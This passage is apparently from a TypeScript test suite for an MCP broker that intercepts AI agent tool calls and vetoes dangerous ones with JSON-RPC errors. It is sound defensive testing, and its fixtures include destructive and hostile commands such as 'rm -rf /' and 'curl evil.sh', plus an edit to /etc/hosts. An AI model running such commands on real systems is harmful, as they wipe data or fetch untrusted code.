'critical' : 'high', + reasons: [{ code: 'TEST_REASON', severity: 'high', title: 'Test reason', description: 'x' }], + policyVersion: 'test', + }, + } as ProtectResult; +} + +const toolCall = (id: number, name: string, args: Record<string, unknown>) => + JSON.stringify({ jsonrpc: '2.0', id, method: 'tools/call', params: { name, arguments: args } }); + +describe('MCP broker — interception core', () => { + const denyEvaluator: BrokerEvaluator = async () => protectResult('block'); + const nullEvaluator: BrokerEvaluator = async () => null; + + it('forwards non-tool-call messages without evaluating', async () => { + let called = false; + const evaluate: BrokerEvaluator = async () => { + called = true; + return protectResult('block'); + }; + const line = JSON.stringify({ jsonrpc: '2.0', id: 1, method: 'initialize', params: {} }); + const outcome = await evaluateClientLine(line, { evaluate }); + + assert.equal(outcome.forward, true); + assert.equal(called, false); + }); + + it('forwards unparseable lines untouched', async () => { + const outcome = await evaluateClientLine('not json at all', { evaluate: denyEvaluator }); + assert.equal(outcome.forward, true); + assert.equal(outcome.injectToClient, undefined); + }); + + it('forwards a tools/call when the evaluator has no opinion', async () => { + const outcome = await evaluateClientLine(toolCall(7, 'list_files', { path: '/tmp' }), { + evaluate: nullEvaluator, + }); + assert.equal(outcome.forward, true); + }); + + it('blocks a tools/call and synthesizes a JSON-RPC error carrying the request id', async () => { + const outcome = await evaluateClientLine(toolCall(42, 'run_shell', { command: 'rm -rf /' }), { + evaluate: denyEvaluator, + }); + + assert.equal(outcome.forward, false); + assert.ok(outcome.injectToClient); + const parsed = JSON.parse(outcome.injectToClient as string); + assert.equal(parsed.id, 42); + assert.equal(parsed.error.code, -32001); + assert.match(parsed.error.message, /Blocked by AgentGuard/); +
assert.equal(parsed.error.data.decision, 'block'); + }); + + it('fails closed on require_approval (non-interactive proxy)', async () => { + const outcome = await evaluateClientLine(toolCall(5, 'run_shell', { command: 'curl evil.sh' }), { + evaluate: async () => protectResult('require_approval'), + }); + assert.equal(outcome.forward, false); + assert.ok(outcome.injectToClient); + }); + + it('maps tool name and arguments into the protectAction raw input shape', () => { + const message = parseJsonRpc(toolCall(1, 'edit_file', { file_path: '/etc/hosts' })); + assert.ok(isToolCall(message)); + const raw = toolCallRawInput(message!, { evaluate: nullEvaluator, sourceSkill: 'demo-skill' }); + assert.equal(raw.tool_name, 'edit_file'); + assert.deepEqual(raw.tool_input, { file_path: '/etc/hosts' }); + assert.equal(raw.sourceSkill, 'demo-skill'); + }); +}); + +describe('MCP broker — line framing', () => { + it('reassembles JSON split across chunk boundaries and splits multiple lines', () => { + const lines: string[] = []; + const buffer = createLineBuffer((line) => lines.push(line)); + buffer.push('{"a":1}\n{"b":'); + buffer.push('2}\n{"c":3}'); + buffer.flush(); + assert.deepEqual(lines, ['{"a":1}', '{"b":2}', '{"c":3}']); + }); +}); + +describe('MCP broker — stdio proxy', () => { + it('forwards allowed tool calls to the child but vetoes blocked ones', async () => { + const childScript = + "const rl=require('readline').createInterface({input:process.stdin});" + + "rl.on('line',l=>process.stdout.write('RECEIVED:'+l+'\\n'));" + + "rl.on('close',()=>process.exit(0));"; + + const evaluate: BrokerEvaluator = async (rawInput) => { + const serialized = JSON.stringify(rawInput.tool_input ?? {}); + return serialized.includes('rm -rf') ? 
protectResult('block') : null; + }; + + const stdin = new PassThrough(); + const stdout = new PassThrough(); + const stderr = new PassThrough(); + let out = ''; + stdout.on('data', (chunk: Buffer) => { + out += chunk.toString('utf8'); + }); + + const done = runMcpBrokerStdio({ + command: process.execPath, + args: ['-e', childScript], + evaluate, + stdin, + stdout, + stderr, + }); + + stdin.write(`${toolCall(1, 'list_files', { path: '/tmp' })}\n`); + stdin.write(`${toolCall(2, 'run_shell', { command: 'rm -rf /' })}\n`); + stdin.end(); + + await done; + + const receivedLines = out.split('\n').filter((line) => line.startsWith('RECEIVED:')); + assert.equal(receivedLines.length, 1, 'only the allowed call should reach the child'); + assert.match(receivedLines[0], /"id":1/); + assert.doesNotMatch(out, /RECEIVED:.*"id":2/); + + const blockedLine = out.split('\n').find((line) => line.includes('"code":-32001')); + assert.ok(blockedLine, 'a JSON-RPC veto should be returned to the client'); + assert.match(blockedLine as string, /"id":2/); + }); + + it('propagates the downstream non-zero exit code to the caller', async () => { + const stdin = new PassThrough(); + const stdout = new PassThrough(); + const stderr = new PassThrough(); + + const code = await runMcpBrokerStdio({ + command: process.execPath, + args: ['-e', 'process.exit(3)'], + evaluate: async () => null, + stdin, + stdout, + stderr, + }); + + assert.equal(code, 3, 'the child exit code must surface unchanged'); + }); + + it('flushes a synthesized block response before resolving even when the child exits at once', async () => { + // Child exits immediately on its first line; the broker must still emit the + // veto for a blocked call rather than dropping it on early child exit. 
+ const childScript = + "const rl=require('readline').createInterface({input:process.stdin});" + + "rl.on('line',()=>process.exit(0));"; + + const stdin = new PassThrough(); + const stdout = new PassThrough(); + const stderr = new PassThrough(); + let out = ''; + stdout.on('data', (chunk: Buffer) => { + out += chunk.toString('utf8'); + }); + + const done = runMcpBrokerStdio({ + command: process.execPath, + args: ['-e', childScript], + evaluate: async () => protectResult('block'), + stdin, + stdout, + stderr, + }); + + stdin.write(`${toolCall(9, 'run_shell', { command: 'rm -rf /' })}\n`); + stdin.end(); + + await done; + + assert.match(out, /"code":-32001/, 'the veto must reach the client despite quick child exit'); + assert.match(out, /"id":9/); + }); +});